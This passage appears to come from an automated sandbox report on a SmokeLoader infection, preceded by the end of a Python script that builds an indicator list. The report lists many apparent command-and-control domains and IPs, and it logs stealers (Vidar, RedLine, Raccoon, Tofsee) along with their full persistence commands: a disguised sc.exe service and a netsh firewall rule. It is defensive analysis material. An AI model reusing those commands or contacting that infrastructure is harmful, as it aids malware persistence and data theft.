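    """address -> names, keeping only addresses that answered for more than one name."""
    by_ip = defaultdict(set)
    for name, addrs in res.items():
        for a in addrs:
            by_ip[a].add(name)
    return {ip: names for ip, names in by_ip.items() if len(names) > 1}


if __name__ == "__main__":
    res = resolutions(FLAT_ROWS)
    for name, addrs in sorted(res.items()):
        print(f"{name:45} {', '.join(sorted(addrs))}")
    for ip, names in shared_hosts(res).items():
        print(f"shared: {ip} <- {sorted(names)}")
```

The parser only handles the successful A-record layout seen on this page; a row with a different reply code or record type will raise rather than silently mis-split, which is the behaviour you want when the output feeds an IOC list. The name/address boundary is safe because a public suffix ends in a letter and the address is pinned on its right by the literal "A (IP address)"; the source/destination boundary is the only genuinely lossy one, and split_two_ips makes that explicit instead of trusting a regex's backtracking order.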

                                                                                  HTTP Request Dependency Graph

                                                                                  • rftojqy.com
                                                                                    • host-data-coin-11.com
                                                                                  • oeicpl.com
                                                                                  • gmlcwn.org
                                                                                  • pmxge.org
                                                                                  • klnnrs.org
                                                                                  • sqgycmxrcw.org
                                                                                  • ordgyi.com
                                                                                  • gdpbobblv.org
                                                                                  • data-host-coin-8.com
                                                                                  • ojnph.org
                                                                                  • qnhvcpx.org
                                                                                  • ukmdaxlu.com
                                                                                  • cocugqsn.org
                                                                                  • bcdqnjq.com
                                                                                  • unicupload.top
                                                                                  • quobomy.org
                                                                                  • hfkcwyd.com
                                                                                  • lhmfcrnoc.net
                                                                                  • rwnoc.com
                                                                                  • hyhfejnsaf.org
                                                                                  • yupkrg.org
                                                                                  • xasgjbpj.net
                                                                                  • dlsrcuywsx.net
                                                                                  • 185.7.214.171:8080
                                                                                  • ygpvsdtxwa.net
                                                                                  • ctudyypa.org
                                                                                  • fnqfdlb.org
                                                                                  • qernbnk.net
                                                                                  • lymetcvj.org
                                                                                  • dwyid.net
                                                                                  • rtyuw.net
                                                                                  • iymvh.com
                                                                                  • aujnrph.com
                                                                                  • qjfqvve.com
                                                                                  • betkhbcokn.net
                                                                                  • buvim.org
                                                                                  • tuwgresxff.net
                                                                                  • esfdrx.org
                                                                                  • gimbqwejt.org
                                                                                  • vqkgjg.net
                                                                                  • qfojwny.com
                                                                                  • jypmxggbe.net
                                                                                  • bopkt.com
                                                                                  • rcosdqvkc.net
                                                                                  • vpvuvi.org
                                                                                  • xchjuwapl.net
                                                                                  • kcgcly.org
                                                                                  • xhcmjwqukh.net
                                                                                  • tbwkdtvra.com
                                                                                  • unlkmoivsp.org
                                                                                  • buyqsohhho.net
                                                                                  • lmtmt.net
                                                                                  • a0621298.xsph.ru
                                                                                  • guadmgqcy.com
                                                                                  • aaxrubcof.net
                                                                                  • uswhy.com
                                                                                  • vqmqnwq.com
                                                                                  • ulfdnrx.net
                                                                                  • vyvnhyowq.net
                                                                                  • 185.215.113.35
                                                                                  • mpjbq.net
                                                                                  • smapchtl.com
                                                                                  • 185.163.204.22
                                                                                  • jeacjnamm.com
                                                                                  • awifxkoma.net
                                                                                  • 185.163.204.24
                                                                                  • aoummij.com
                                                                                  • omefw.net
                                                                                  • bgprljhr.com
                                                                                  • lptdnkjgh.net

                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  System Behavior

                                                                                  General

                                                                                  Start time:09:24:18
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\Desktop\tijXCZsbGe.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\tijXCZsbGe.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:320512 bytes
                                                                                  MD5 hash:888928D26BD03678AFD9FED0D92F6FC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:09:24:19
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\Desktop\tijXCZsbGe.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\tijXCZsbGe.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:320512 bytes
                                                                                  MD5 hash:888928D26BD03678AFD9FED0D92F6FC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.719913794.0000000000591000.00000004.00020000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.719885078.0000000000570000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:09:24:26
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\explorer.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                  Imagebase:0x7ff6fee60000
                                                                                  File size:3933184 bytes
                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.708378047.0000000004DF1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:09:24:27
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff6eb840000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:09:24:46
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff732050000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:09:24:58
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Roaming\rifsswe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\rifsswe
                                                                                  Imagebase:0x400000
                                                                                  File size:320512 bytes
                                                                                  MD5 hash:888928D26BD03678AFD9FED0D92F6FC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:09:24:59
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Roaming\rifsswe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\rifsswe
                                                                                  Imagebase:0x400000
                                                                                  File size:320512 bytes
                                                                                  MD5 hash:888928D26BD03678AFD9FED0D92F6FC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.767900095.0000000000640000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.768056484.00000000022F1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:09:25:02
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\9334.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\9334.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:301056 bytes
                                                                                  MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 46%, Metadefender, Browse
                                                                                  • Detection: 77%, ReversingLabs
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:09:25:02
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff6eb840000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:09:25:05
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                  Imagebase:0x7ff6eb840000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:09:25:05
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100
                                                                                  Imagebase:0xe90000
                                                                                  File size:434592 bytes
                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:09:25:06
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 264
                                                                                  Imagebase:0xe90000
                                                                                  File size:434592 bytes
                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:09:25:07
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\DB31.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\DB31.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:322560 bytes
                                                                                  MD5 hash:6009BCB680BE6C0F656AA157E56423DC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.780534031.0000000000712000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.780534031.0000000000712000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:09:25:11
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\E748.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\E748.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:319488 bytes
                                                                                  MD5 hash:7C64BD730B6C9565F287278834A33618
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.953428772.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.957118764.0000000000630000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000003.783551055.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:09:25:14
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  Imagebase:0xab0000
                                                                                  File size:537088 bytes
                                                                                  MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.825741767.0000000003F01000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:09:25:16
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xzxafeeu\
                                                                                  Imagebase:0x11d0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:09:25:16
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Start time:09:25:17
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\
                                                                                  Imagebase:0x11d0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Start time:09:25:17
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Start time:09:25:17
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                  Imagebase:0xd10000
                                                                                  File size:60928 bytes
                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Start time:09:25:18
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Start time:09:25:19
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\sc.exe" description xzxafeeu "wifi internet conection
                                                                                  Imagebase:0xd10000
                                                                                  File size:60928 bytes
                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Start time:09:25:19
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Start time:09:25:19
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff6eb840000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Start time:09:25:20
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\sc.exe" start xzxafeeu
                                                                                  Imagebase:0xd10000
                                                                                  File size:60928 bytes
                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Start time:09:25:20
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Start time:09:25:21
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d"C:\Users\user\AppData\Local\Temp\E748.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:11673600 bytes
                                                                                  MD5 hash:6DD4312F6A305B72C1A1948F27068190
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.803587070.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.803962316.00000000005A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000003.801375609.00000000005A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.803904384.0000000000580000.00000040.00000001.sdmp, Author: Joe Security

                                                                                  General

                                                                                  Start time:09:25:21
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                  Imagebase:0x360000
                                                                                  File size:82944 bytes
                                                                                  MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  General

                                                                                  Start time:09:25:22
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:svchost.exe
                                                                                  Imagebase:0x12f0000
                                                                                  File size:44520 bytes
                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000022.00000002.949927934.00000000005D0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                  General

                                                                                  Start time:09:25:24
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  Imagebase:0x4d0000
                                                                                  File size:537088 bytes
                                                                                  MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000023.00000000.820336133.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000023.00000000.821341997.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000023.00000000.819697566.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000023.00000000.820836278.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                  General

                                                                                  Start time:09:25:41
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:905216 bytes
                                                                                  MD5 hash:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000026.00000003.868438969.0000000004DE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000026.00000002.1024945743.0000000004D40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000026.00000002.953575570.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                                                  Disassembly

                                                                                  Code Analysis
